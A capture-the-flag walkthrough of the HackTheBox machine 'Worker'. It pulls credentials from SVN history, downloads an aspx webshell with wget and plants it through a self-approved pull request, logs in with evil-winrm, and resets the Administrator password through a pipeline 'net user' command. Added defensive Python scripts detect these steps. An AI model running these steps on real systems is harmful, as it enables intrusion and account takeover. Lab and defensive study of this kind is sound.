Today we are going to crack a machine called Worker. It was created by ekenas. This is a Capture the Flag type of challenge. The machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
- Network Scanning
- Nmap Scan
- Enumeration
- Browsing HTTP Service
- Enumerating SVN
- Editing Hosts into /etc/hosts
- Enumerating HTTP Service
- Enumerating Source Code
- Enumerating SVN Revisions
- Extracting Nathen’s Credentials
- Login as Nathen
- Exploitation
- Enumerating Azure DevOps
- Enumerating Repos and Branches
- Creating New Branch
- Exploit File Upload
- Download aspx webshell
- Commit Merge Request
- Creating a Pull Request
- Approve Pull Request
- Completing Pull Request
- Accessing the Web Shell
- Enumerating SVN repos
- Getting Credentials for robisl
- Logging in as robisl with Evil-WinRM
- Reading User Flag
- Privilege Escalation
- Enumerating PartsUnlimited Project
- Creating Pipeline
- Edit pipeline YAML to change Admin Password
- Save and Run Pipeline
- Logging in as Administrator
- Reading the Root Flag
Walkthrough
Network Scanning
To attack any machine, we need its IP address. Machines hosted on HackTheBox have a static IP address.
IP Address assigned: 10.129.2.29
Now that we have the IP address, we need to enumerate the open ports on the machine. For this, we run an Nmap scan.
The Nmap version scan quickly gave us some useful information: it showed that the following ports and services are open: HTTP (80) and SVN (3690).
Enumeration
Since we have an HTTP service, we try to browse the application on port 80 with a web browser. It is the basic IIS server welcome page.
We try to get a local copy of the repository from the server with the help of the checkout command. As we want to access files from the SVN server, checkout is the best way to go.
svn checkout svn://10.129.2.29
In the directory svn copied, we got a moved.txt file that tells us about the devops.worker.htb host, and we got another host by the name of dimension.worker.htb.
We add both hosts to the /etc/hosts file in order to access them.
nano /etc/hosts
10.129.2.29 devops.worker.htb dimension.worker.htb
Starting with the dimension.worker.htb, we open it into the Web Browser to find a static HTML website with a bunch of broken links.
We enumerated the source code to find another bunch of hosts, as shown in the image below.
We checked the previous revisions of the SVN repository and found that the latest revision was 5. We check the other revisions and end up on revision 2. Here we found the credentials for the user Nathen.
svn checkout svn://10.129.2.29:3690
svn diff -r2
$user = "nathen"
$plain = "wendel98"
When we tried to visit devops.worker.htb, it required a set of credentials. We entered Nathen’s credentials.
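The revision 2 leak above is the general case of secrets surviving in version history: deleting a credential in a later commit does not remove it from the earlier revision. The following added example (not from the original post) scans per-revision svn diff output for credential-like added lines so a repository owner can find such leftovers before an attacker does; the revision texts embedded below are constructed around the values shown above, and the file name deploy.ps1 is assumed.

```python
import re

# Credential-like assignments in added (+) diff lines: the PowerShell-style
# $user/$plain pair seen in the revision 2 diff above, plus generic password keys.
SECRET_PATTERNS = [
    re.compile(r'^\+\s*\$(?P<key>user|plain|pass(?:word)?|secret)\s*=\s*"(?P<value>[^"]+)"', re.I),
    re.compile(r'^\+\s*(?P<key>password|passwd|secret|token)\s*[:=]\s*["\']?(?P<value>[^"\'\s]+)', re.I),
]


def scan_revision_diff(rev, diff_text):
    """Return (revision, key, value) for every added line that looks like a credential."""
    findings = []
    for line in diff_text.splitlines():
        for pat in SECRET_PATTERNS:
            m = pat.match(line)
            if m:
                findings.append((rev, m.group("key"), m.group("value")))
                break
    return findings


def scan_history(diffs_by_revision):
    """diffs_by_revision maps revision number -> text of `svn diff -c <rev>` for that revision."""
    findings = []
    for rev in sorted(diffs_by_revision):
        findings.extend(scan_revision_diff(rev, diffs_by_revision[rev]))
    return findings


# Constructed sample history: credentials committed in r2 and removed again in r3.
# r3 removing them does not undo r2, which is exactly why the whole history is scanned.
SAMPLE_DIFFS = {
    2: ('Index: deploy.ps1\n'
        '+$user = "nathen"\n'
        '+$plain = "wendel98"\n'
        '+$pwd = ConvertTo-SecureString $plain -AsPlainText -Force\n'),
    3: ('Index: deploy.ps1\n'
        '-$user = "nathen"\n'
        '-$plain = "wendel98"\n'
        '+$plain = Get-Content creds.txt\n'),
}

if __name__ == "__main__":
    for rev, key, value in scan_history(SAMPLE_DIFFS):
        print(f"r{rev}: {key} = {value!r}")
```

Against a real repository, feed it the output of svn diff -c N for every N listed by svn log -q.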
Exploitation
We end up with an Azure DevOps instance for a SmartHotel360 project. We enumerate the repos and the various branches in the project.
We tried creating a new branch in the project.
We named the branch we created ignite. The branch is based on master. Click on Create Branch here.
This led us to the Upload File options in the Branch Menu as shown in the image.
As this is a Windows-based machine running IIS with a .NET application, we decided to download an aspx shell. It downloads as a text file, so rename it before use.
wget https://dl.packetstormsecurity.net/UNIX/penetration/aspxshell.aspx.txt
mv aspxshell.aspx.txt aspxshell.aspx
After uploading the file, we have to commit this branch in order to merge it into the master branch. Add the same branch name we created earlier and add 1 in the work item linking field. This is done to link the ignite branch commit with the master branch.
After this is done, we need to create a pull request in order to merge the commit. This can be done by clicking the Create a pull request option as shown in the image below.
If you have ever worked with Git or a similar environment, you know that a reviewer needs to approve the commit. We add Nathen, or as the name is shown in the project, “Nathalie Henley”, as the reviewer so that we can approve it ourselves. After doing this, click on the Create button to move forward.
We went back to the branches and commits to see that the pull request we just added is waiting for approval. Click on the Approve button as shown in the image below.
After approval, we need to Complete the pull request in order to execute the payload on the target machine.
This will show that we can complete the merge of the ignite branch with the malicious file. Click on Complete merge to move forward.
We can see that the merge is complete. Now we need to access the shell that we uploaded.
We can check that the shell is uploaded by looking at the master branch inside the spectral directory; we see that it now contains the shell we uploaded earlier.
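What made the merge above dangerous is the combination of two things: the master branch content is served straight out of an IIS web root, and the pull request was approved by its own author. The following added example (not part of the original post, and not an Azure DevOps API) is a branch-policy style check that a repository owner could run on each pull request: it blocks newly added server-executable files under web-served paths and rejects self-approval. The pull request data and the spectral/ web-root mapping are constructed to mirror the steps above.

```python
from pathlib import PurePosixPath

# File types IIS executes server-side; a newly added file of one of these types in a
# branch deployed to a web root is treated as a webshell until a human says otherwise.
SERVER_EXECUTABLE = {".aspx", ".ashx", ".asmx", ".asp"}
# Repository prefixes that are deployed into a web root (constructed for this example).
WEB_ROOTS = ("spectral/",)


def check_changed_files(changes):
    """changes: list of (status, path) as in git name-status ('A' added, 'M' modified)."""
    violations = []
    for status, path in changes:
        ext = PurePosixPath(path).suffix.lower()
        # Only brand-new executables are blocked here; edits to existing ones go to review.
        if status == "A" and path.startswith(WEB_ROOTS) and ext in SERVER_EXECUTABLE:
            violations.append(f"new server-executable file in web root: {path}")
    return violations


def check_reviewers(author, approvers, minimum=1):
    """Approvals by the author do not count; require `minimum` independent approvals."""
    independent = {a.lower() for a in approvers} - {author.lower()}
    if len(independent) < minimum:
        return [f"only {len(independent)} independent approval(s), author {author} excluded"]
    return []


def evaluate_pull_request(pr):
    """Return every policy violation; an empty list means the PR may be completed."""
    return check_changed_files(pr["changes"]) + check_reviewers(pr["author"], pr["approvers"])


# Constructed pull request mirroring the walkthrough: the author adds an .aspx file
# under spectral/ and approves the request as its only reviewer.
SAMPLE_PR = {
    "author": "nathen",
    "approvers": ["nathen"],
    "changes": [("A", "spectral/aspxshell.aspx"), ("M", "spectral/index.html")],
}

if __name__ == "__main__":
    for violation in evaluate_pull_request(SAMPLE_PR):
        print("BLOCK:", violation)
```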
We add spectral.worker.htb to /etc/hosts to access the webshell that we just uploaded. It is one of the links that we discovered earlier in the source code of dimension.worker.htb.
nano /etc/hosts
10.129.2.29 devops.worker.htb dimension.worker.htb spectral.worker.htb
Upon browsing the webshell in the browser we see that we can execute a bunch of commands and access the directories and upload files as well. Let’s enumerate!
Going through the SVN repositories, we find a conf directory; inside it we found the passwd file.
There are a bunch of users here. We tried them and found that robisl’s works.
We used Evil-WinRM to connect to the target machine as the robisl user.
Here we have the user flag.
evil-winrm -i 10.129.2.29 -u robisl -p wolves11
cd ..
cd Desktop
ls
type user.txt
Privilege Escalation
These credentials also work on the devops host where we logged in as Nathen earlier.
Here we see that we have another project called PartsUnlimited. Let’s check it out.
Through enumeration, we see that this project only has one repo. It has an awful lot of files and directories, but we didn’t find anything of interest. Inside the project settings, in the General section and Security subsection, we found that robisl is a Build Administrator. That means we can use this account to build a pipeline. We click on the New Pipeline button.
It asks us for the location of our YAML code. We choose the Azure Repos Git option.
We choose the PartsUnlimited repository
Here we see a bunch of different pipelines. We choose the Starter Pipeline as it is the simplest of all.
We got a YAML pipeline file as shown in the image below. It has a script parameter which has the command of Hello World.
It also mentions the pool. As we don’t have any pool, let’s remove it. Then we replace the script with a net user command to reset the password for the Administrator to something simple such as Password@1. We chose such a password in order to comply with the password policy.
Let’s save and run this pipeline in the repository. Click on create new branch to commit and start a pull request, as committing directly to the master branch won’t get the reaction we need.
After working for a while and committing all the code, including our net user command inside the yml file, we can assume that the command was executed and the password for the Administrator was changed.
Let’s log in using Evil-WinRM and read the root flag to conclude the machine.
evil-winrm -i 10.129.2.29 -u Administrator -p Password@1
cd ..
cd Desktop
ls
type root.txt
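Running an arbitrary pipeline script on a build agent that holds local administrator rights is what turned a Build Administrator into a full compromise above. On the host, a net user reset like that one leaves Windows Security event 4724 (an attempt was made to reset an account’s password) with the agent’s service account as the subject, which is the signal a defender wants to alert on. The following added example (not from the original post) flags such events against protected accounts; the log lines are constructed in a simplified key=value rendering, and the agent account name svc-buildagent is assumed.

```python
import re
from dataclasses import dataclass

# Simplified one-line rendering of a Security event (constructed for this example;
# real exports are XML or EVTX but carry the same field names).
EVENT_RE = re.compile(
    r"EventID=(?P<event_id>\d+)\s+SubjectUserName=(?P<subject>\S+)\s+"
    r"TargetUserName=(?P<target>\S+)\s+Computer=(?P<computer>\S+)"
)

# 4724: an attempt was made to reset an account's password (set without the old one).
PASSWORD_RESET = "4724"
PROTECTED_ACCOUNTS = {"administrator"}
# Principals expected to reset passwords; the build agent's account is deliberately absent.
APPROVED_SUBJECTS = {"helpdesk-admin"}


@dataclass(frozen=True)
class Alert:
    computer: str
    subject: str
    target: str


def parse_event(line):
    m = EVENT_RE.search(line)
    return m.groupdict() if m else None


def find_suspicious_resets(lines):
    """Return an Alert for each 4724 where a protected account is reset by an unapproved subject."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if not ev or ev["event_id"] != PASSWORD_RESET:
            continue
        if ev["target"].lower() in PROTECTED_ACCOUNTS and ev["subject"].lower() not in APPROVED_SUBJECTS:
            alerts.append(Alert(ev["computer"], ev["subject"], ev["target"]))
    return alerts


# Constructed log lines: a routine helpdesk reset, the assumed agent account resetting
# Administrator (the pipeline case above), and an unrelated logon event.
SAMPLE_LOGS = [
    "EventID=4724 SubjectUserName=helpdesk-admin TargetUserName=jdoe Computer=WORKER",
    "EventID=4724 SubjectUserName=svc-buildagent TargetUserName=Administrator Computer=WORKER",
    "EventID=4624 SubjectUserName=svc-buildagent TargetUserName=Administrator Computer=WORKER",
]

if __name__ == "__main__":
    for a in find_suspicious_resets(SAMPLE_LOGS):
        print(f"ALERT {a.computer}: {a.subject} reset the password of {a.target}")
```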
Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. He can be contacted on Twitter and LinkedIn.